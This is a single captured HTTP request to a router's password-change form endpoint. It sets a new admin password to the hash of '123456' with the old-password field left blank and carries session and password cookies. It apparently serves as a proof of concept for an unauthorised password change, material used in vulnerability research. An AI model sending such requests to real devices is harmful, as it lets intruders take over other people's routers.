POST /goform/SysToolChangePwd HTTP/1.1
Host: 192.168.69.4:49155
Content-Length: 110
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.69.4:49155
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.69.4:49155/system_password.html?random=0.0772751827235123&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSION_ID=2:1678344746:2; password=mrbcvb; bLanguage=cn
Connection: close

GO=system_password.html&SYSOPS=&SYSPS=e10adc3949ba59abbe56e057f20f883e&SYSPS2=e10adc3949ba59abbe56e057f20f883e